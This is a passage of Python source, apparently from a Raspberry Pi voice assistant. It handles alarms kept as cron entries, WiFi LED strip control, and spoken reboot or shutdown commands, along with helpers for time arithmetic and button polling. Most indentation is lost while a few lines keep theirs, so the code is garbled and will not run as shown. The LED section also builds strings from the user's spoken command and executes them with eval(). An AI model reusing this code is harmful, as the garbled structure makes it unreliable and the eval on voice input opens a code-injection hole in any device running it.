del self.act_cron[self.act_cron.index(alar)]
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if alarm_setting_add == []:
listalchoice = []
for alar in listal:
if alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
del self.act_cron[self.act_cron.index(listalchoice[0])]
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' has been removed', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms have been removed']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
del self.act_cron[self.act_cron.index(alar)]
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
                                                Myassistant.say(self, "Ok, all alarms have been removed", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add and alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
del self.act_cron[self.act_cron.index(listalchoice[0])]
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' has been removed', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms have been removed']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
del self.act_cron[self.act_cron.index(alar)]
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
elif alarm_option_add == 'disable':
if len(listal) == 0:
Myassistant.say(self, "You don't have any alarm", 'en')
elif len(listal) == 1:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i - 1
                                    Myassistant.say(self, "Ok, your alarm is disabled", 'en')
else:
if alarm_time_add == ():
if alarm_setting_add == []:
jjfd = True
ttytrj = 0
for e in self.tink:
if 'alarm' in e:
jjfd = False
del self.tink[ttytrj]
else:
ttytrj = ttytrj + 1
if jjfd:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
tr = tr + '. What is your choice ?'
self.tink.append('alarm["disable"]')
Myassistant.say(self, tr, 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i - 1
                                                Myassistant.say(self, "Ok, all alarms are disabled", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
                                                    Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is disabled', 'en')
else:
                                                    f = ['Ok, '+str(len(listalchoice))+' alarms are disabled']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if alarm_setting_add == []:
listalchoice = []
for alar in listal:
if alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
                                                Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is disabled', 'en')
else:
                                                f = ['Ok, '+str(len(listalchoice))+' alarms are disabled']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i - 1
                                                Myassistant.say(self, "Ok, all alarms are disabled", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add and alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
                                                    Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is disabled', 'en')
else:
                                                    f = ['Ok, '+str(len(listalchoice))+' alarms are disabled']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
elif alarm_option_add == 'enable':
if len(listal) == 0:
Myassistant.say(self, "You don't have any alarm", 'en')
elif len(listal) == 1:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i - 1
                                    Myassistant.say(self, "Ok, your alarm is enabled", 'en')
else:
if alarm_time_add == ():
if alarm_setting_add == []:
jjfd = True
ttytrj = 0
for e in self.tink:
if 'alarm' in e:
jjfd = False
del self.tink[ttytrj]
else:
ttytrj = ttytrj + 1
if jjfd:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
                                    tr = tr + '. What is your choice?'
self.tink.append('alarm["enable"]')
Myassistant.say(self, tr, 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i - 1
Myassistant.say(self, "Ok, all alarm are enable", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is enable', 'en')
else:
                                        f = ['Ok, '+str(len(listalchoice))+' alarms are enabled']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if alarm_setting_add == []:
listalchoice = []
for alar in listal:
if alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' are enable', 'en')
else:
                                    f = ['Ok, '+str(len(listalchoice))+' alarms are enabled']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i - 1
Myassistant.say(self, "Ok, all alarm are enable", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add and alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(listalchoice[0])][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(listalchoice[0])][3]:
self.act_cron[self.act_cron.index(listalchoice[0])][3] = 'Myassistant.alarm_dring(self)#cantdel'
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' is enable', 'en')
else:
                                        f = ['Ok, '+str(len(listalchoice))+' alarms are enabled']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[self.act_cron.index(alar)][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[self.act_cron.index(alar)][3]:
self.act_cron[self.act_cron.index(alar)][3] = 'Myassistant.alarm_dring(self)#cantdel'
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
i = 0
alarim = []
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
alarim.append(self.act_cron[i])
i = i + 1
if str(alarim) == '[]':
alarim = 'None'
self.var_save["Alarm cron"] = alarim
Myassistant.save_var_in_file(self)
if settings.get("Led strips"):
leditest = []
for leds in settings.get("Led strips names"):
if str(leds[0]).lower() in str(usrcmd).lower():
leditest.append(str(leds[0]))
if 'my light' in str(usrcmd).lower():
if str(leditest) == '[]':
leditest = ['All']
for ffd in self.tink:
if 'led strip' in ffd:
hudgfisdu = []
hudgfisdu = eval(str(ffd.split('$')[1]))
for te in hudgfisdu:
leditest.append(te)
if not str(leditest) == '[]':
lmk = []
if 'turn on' in str(usrcmd).lower():
lmk.append('turnOn()')
elif 'turn off' in str(usrcmd).lower():
lmk.append('turnOff()')
llmmh = True
colorlist = ['seven color cross fade','red gradual change','green gradual change','blue gradual change','yellow gradual change','cyan gradual change','purple gradual change','white gradual change','red green cross fade','red blue cross fade','green blue cross fade','seven color strobe flash','red strobe flash','green strobe flash','blue strobe flash','yellow strobe flash','cyan strobe flash','purple strobe flash','white strobe flash','seven color jumping']
coloraction = ['setPresetPattern(0x25,100)','setPresetPattern(0x26,100)','setPresetPattern(0x27,100)','setPresetPattern(0x28,100)','setPresetPattern(0x29,100)','setPresetPattern(0x2a,100)','setPresetPattern(0x2b,100)','setPresetPattern(0x2c,100)','setPresetPattern(0x2d,100)','setPresetPattern(0x2e,100)','setPresetPattern(0x2f,100)','setPresetPattern(0x30,100)','setPresetPattern(0x31,100)','setPresetPattern(0x32,100)','setPresetPattern(0x33,100)','setPresetPattern(0x34,100)','setPresetPattern(0x35,100)','setPresetPattern(0x36,100)','setPresetPattern(0x37,100)','setPresetPattern(0x38,100)']
oogjg = len(colorlist) - 1
while oogjg > - 1:
if colorlist[oogjg].lower() in str(usrcmd).lower() and llmmh == True:
llmmh = False
if '%' in str(usrcmd).lower():
try:
yytr = str(usrcmd).lower().index('%')
oppm = []
ppg = True
while ppg:
yytr = yytr - 1
if str(usrcmd).lower()[yytr] == ' ':
ppg = False
else:
oppm.append(str(usrcmd).lower()[yytr])
oppm.reverse()
ll = "".join(oppm)
lmk.append(coloraction[oogjg].replace('100',str(ll)))
except:
lmk.append(coloraction[oogjg])
else:
lmk.append(coloraction[oogjg])
oogjg = oogjg - 1
if '%' in str(usrcmd).lower() and llmmh == True:
try:
yytr = str(usrcmd).lower().index('%')
oppm = []
ppg = True
while ppg:
yytr = yytr - 1
if str(usrcmd).lower()[yytr] == ' ':
ppg = False
else:
oppm.append(str(usrcmd).lower()[yytr])
oppm.reverse()
ll = "".join(oppm)
ghf = int(ll)
ghf = 255 * ghf / 100
ghf = round(ghf)
ll = str(ghf)
lmk.append('brightness='+ll)
except:
pass
if llmmh == True:
for color in settings.get('Custom colors'):
if str(color[0]).lower() in str(usrcmd).lower() and llmmh == True:
llmmh = False
lmk.append(str(color[1]))
if llmmh == True:
responscoled = flux_led.utils.get_color_names_list()
for tey in responscoled:
if str(tey).lower() in str(usrcmd).lower() and llmmh == True:
llmmh = False
resultintero = flux_led.utils.color_object_to_tuple(str(tey))
lmk.append('setRgb('+str(resultintero[0])+','+str(resultintero[1])+','+str(resultintero[2])+')')
assistant.stop_conversation()
if not str(lmk) == '[]':
pr = 0
while pr < len(self.tink):
if 'led strip' in self.tink[pr]:
del self.tink[pr]
pr = pr + 1
name_wifi_led = []
led = flux_led.__main__
for wifi_led in settings.get('Led strips names'):
listwifi[str(wifi_led[0])]=led.WifiLedBulb(wifi_led[1])
name_wifi_led.append(wifi_led[0])
try:
for hhg in leditest:
if hhg == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn() and not 'turnOff()' in lmk and not 'turnOn()' in lmk:
wifiled.turnOn()
time.sleep(1)
for kdk in lmk:
if 'brightness' in kdk:
y = wifiled.getRgbw()
eval('wifiled.setRgbw(r='+str(y[0])+',g='+str(y[1])+',b='+str(y[2])+',w='+str(y[3])+','+str(kdk)+')')
else:
eval('wifiled.'+kdk)
else:
                                # use the strip name selected in the loop; `name` was never defined in this scope
                                wifiled = listwifi[hhg]
if not wifiled.isOn() and not 'turnOff()' in lmk and not 'turnOn()' in lmk:
wifiled.turnOn()
time.sleep(1)
for kdk in lmk:
if 'brightness' in kdk:
y = wifiled.getRgbw()
eval('wifiled.setRgbw(r='+str(y[0])+',g='+str(y[1])+',b='+str(y[2])+',w='+str(y[3])+','+str(kdk)+')')
else:
eval('wifiled.'+kdk)
except BrokenPipeError:
print('Failed : "led strip"')
else:
ytr = True
pr = 0
while pr < len(self.tink):
if 'led strip' in self.tink[pr]:
ytr = False
del self.tink[pr]
pr = pr + 1
if ytr:
self.tink.append('led strip$'+str(leditest))
Myassistant.say(self, "What do you want to do with this led strips ?", 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
if settings.get("Shutdown option"):
if 'reboot' in str(usrcmd).lower() or 'reboot' in self.tink:
if 'reboot' in self.tink:
del self.tink[self.tink.index('reboot')]
assistant.stop_conversation()
if 'yes' in str(usrcmd).lower():
Myassistant.say(self, Myassistant.yes(), 'en')
if settings.get("Sense hat"):
hat.clear()
os.system('sudo reboot')
else:
Myassistant.say(self, 'Ok, cancel', 'en')
elif 'please' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes(), 'en')
if settings.get("Sense hat"):
hat.clear()
os.system('sudo reboot')
else:
assistant.stop_conversation()
self.tink.append('reboot')
Myassistant.say(self, "Are you sure ?", 'en')
assistant.start_conversation()
if 'shut down' in str(usrcmd).lower() or 'power off' in str(usrcmd).lower() or 'shut down' in self.tink:
if 'shut down' in self.tink:
del self.tink[self.tink.index('shut down')]
assistant.stop_conversation()
if 'yes' in str(usrcmd).lower():
Myassistant.say(self, Myassistant.yes(), 'en')
if settings.get("Sense hat"):
hat.clear()
os.system('sudo halt')
else:
Myassistant.say(self, 'Ok, cancel', 'en')
elif 'please' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes(), 'en')
if settings.get("Sense hat"):
hat.clear()
os.system('sudo halt')
else:
assistant.stop_conversation()
self.tink.append('shut down')
Myassistant.say(self, "Are you sure ?", 'en')
assistant.start_conversation()
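    # Keep only the characters of `chaine` that appear in the allowed alphabet (letters, digits, accents and basic punctuation).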
def alpha(chaine):
alphabet = 'abcdefghijklmnopqrstuvwxyz 0123456789 éêëè áâäà ùñóíç ’""° ,. !¡ ?¿ +-÷x='
l = []
chaine = chaine
i = len(chaine) - 1
while i > -1 :
l.append(chaine[i])
i = i - 1
i = len(l) - 1
while i > -1 :
if not l[i].lower() in str(alphabet):
del l[i]
i = i - 1
l.reverse()
l = "".join(l)
return l
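    # Translate `words` into the language `lang` and return the cleaned-up text.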
def trans(words,lang):
translator = Translator()
transword= translator.translate(words, dest=lang)
transword=transword.text
transword=transword.replace("Text, ",'',1)
transword=transword.strip()
return transword
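    # Return a random affirmative phrase, with a 50% chance of appending the configured name.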
def yes():
b = random.randint(0,11)
p = ()
if b == 0 or b == 1 or b == 2:
p = 'ok'
elif b == 3 or b == 4:
p = 'okay'
elif b == 5 or b == 6:
p = 'of course'
elif b == 7 or b == 8:
p = 'yes'
elif b == 9:
p = 'yep'
elif b == 10:
p = 'yea'
elif b == 11:
p = 'yeah'
else:
p = ''
b = random.randint(0,1)
if b == 0 :
p = p + ' ' + settings.get("Name")
return p
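    # Fuzzy-match `word` against `listc` (case-insensitive) and return the close matches with their original casing.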
def get_mots(word,listc,sensibility=0):
listclower = []
for element in listc:
listclower.append(str(element).lower())
if sensibility == 0:
result = difflib.get_close_matches(str(word).lower(), listclower)
else:
result = difflib.get_close_matches(str(word).lower(), listclower,sensibility)
resultuper = []
for elementlow in result:
resultuper.append(str(listc[listclower.index(elementlow)]))
return resultuper
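    # Collect the entries of `listc` that contain `word`, retrying with progressively shorter prefixes of the word.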
def search_wordt(word,listc):
fgh = []
i = len(word) - 1
while i > -1:
o = len(listc) - 1
while o > -1:
if word.lower() in listc[o].lower():
fgh.append(str(listc[o]))
del listc[o]
o = o - 1
kj = []
for g in word:
kj.append(g)
del kj[len(kj)-1]
word = "".join(kj)
i = i - 1
return fgh
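    # Recursively search the directory `rep` for a file named `fichier` and return the directory that contains it ('' if not found).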
def cherchefichier(fichier, rep):
entrees = os.listdir(rep)
for entree in entrees:
if (not os.path.isdir(os.path.join(rep, entree))) and (entree==fichier):
return rep
for entree in entrees:
rep2 = os.path.join(rep, entree)
if os.path.isdir(rep2):
chemin = Myassistant.cherchefichier(fichier, rep2)
if chemin!="":
return chemin
return ""
def time_as_not_pass(hour,minute):
if int(time.strftime("%H")) < int(hour):
return True
elif int(time.strftime("%H")) == int(hour):
if int(time.strftime("%M")) < int(minute):
return True
else:
return False
else:
return False
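    # True when the given time falls inside the configured connection window, or when no network constraint is set.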
def have_network(hour,minute):
if settings.get("Network constraint"):
startnet = settings.get("Start of conection").split(",")
endnet = settings.get("End of conection").split(",")
startnet = datetime.time(int(startnet[0]),int(startnet[1]))
endnet = datetime.time(int(endnet[0]),int(endnet[1]))
timefornet = datetime.time(int(hour),int(minute))
if timefornet > startnet and timefornet < endnet:
return True
else:
return False
else:
return True
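    # Add `ad` minutes to an hour/minute pair, carrying into the hour, and return both as zero-padded strings.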
def ad_min_hour(hour,minu,ad):
while ad > 0:
minu = int(minu) + 1
if minu > 59:
minu = '00'
hour = Myassistant.ad_hour(hour,1)
elif len(str(minu)) < 2:
minu = '0' + str(minu)
ad = ad - 1
return [str(hour),str(minu)]
def remove_min_hour(hour,minu,ad):
        # Subtract `ad` minutes from the hour/minute pair, borrowing one hour when the minutes wrap below zero.
        while ad > 0:
            minu = int(minu) - 1
            if minu < 0:
                minu = '59'
                hour = Myassistant.remove_hour(hour,1)
            elif len(str(minu)) < 2:
                minu = '0' + str(minu)
            ad = ad - 1
return [str(hour),str(minu)]
def ad_hour(hour,ad):
while ad > 0:
hour = int(hour) + 1
if hour > 23:
hour = '00'
elif len(str(hour)) < 2:
hour = '0' + str(hour)
ad = ad - 1
return str(hour)
def remove_hour(hour,remove):
while remove > 0:
hour = int(hour) - 1
if hour < 0:
hour = '23'
elif len(str(hour)) < 2:
hour = '0' + str(hour)
remove = remove - 1
return str(hour)
def ad_min(minu,ad):
while ad > 0:
minu = int(minu) + 1
if minu > 59:
minu = '00'
elif len(str(minu)) < 2:
minu = '0' + str(minu)
ad = ad - 1
return str(minu)
def remove_min(minu,remove):
while remove > 0:
minu = int(minu) - 1
if minu < 0:
minu = '59'
elif len(str(minu)) < 2:
minu = '0' + str(minu)
remove = remove - 1
return str(minu)
def ad_day(day,ad):
while ad > 0:
if day == "Monday" :
day = 'Tuesday'
elif day == "Tuesday" :
day = 'Wednesday'
elif day == "Wednesday" :
day = 'Thursday'
elif day == "Thursday" :
day = 'Friday'
elif day == "Friday" :
day = 'Saturday'
elif day == "Saturday" :
day = 'Sunday'
elif day == "Sunday" :
day = 'Monday'
ad = ad - 1
return str(day)
def remove_day(day,remove):
while remove > 0:
if day == "Monday" :
day = 'Sunday'
elif day == "Tuesday" :
day = 'Monday'
elif day == "Wednesday" :
day = 'Tuesday'
elif day == "Thursday" :
day = 'Wednesday'
elif day == "Friday" :
day = 'Thursday'
elif day == "Saturday" :
day = 'Friday'
elif day == "Sunday" :
day = 'Saturday'
remove = remove - 1
return str(day)
def ad_letter(letter,ad,listl='abcdefghijklmnopqrstuvwxyz '):
listm = []
for letre in listl:
listm.append(letre)
posi = listm.index(letter)
while ad > 0:
posi = posi + 1
if posi > len(listm)-1:
posi = 0
ad = ad - 1
return listm[posi]
def remove_letter(letter,remove,listl='abcdefghijklmnopqrstuvwxyz '):
listm = []
for letre in listl:
listm.append(letre)
posi = listm.index(letter)
while remove > 0:
posi = posi - 1
if posi < 0:
posi = len(listm)-1
remove = remove - 1
return listm[posi]
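    # Poll the four GPIO buttons while a menu screen is shown and queue the presses (0-3) in self.buton.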
def butonshearch(self):
pressed = 0
while not self.affichage == 'heure' and not self.affichage == '':
bouton = True
while not self.affichage == 'heure' and not self.affichage == '' and bouton:
if GPIO.input(bsquare) == 0 or GPIO.input(bround) == 0 or GPIO.input(brigt) == 0 or GPIO.input(bleft) == 0:
self.veil = 0
if GPIO.input(bsquare) == 0:
self.buton.append(0)
elif GPIO.input(bround) == 0:
self.buton.append(1)
elif GPIO.input(brigt) == 0:
self.buton.append(2)
elif GPIO.input(bleft) == 0:
self.buton.append(3)
bouton = False
else:
time.sleep(0.1)
if not pressed > 2:
time.sleep(0.3)
else:
time.sleep(0.15)
if GPIO.input(bsquare) == 0 or GPIO.input(bround) == 0 or GPIO.input(brigt) == 0 or GPIO.input(bleft) == 0:
pressed = pressed + 1
else:
pressed = 0
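    # Sense HAT animation: spin the four coloured pixels of the logo.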
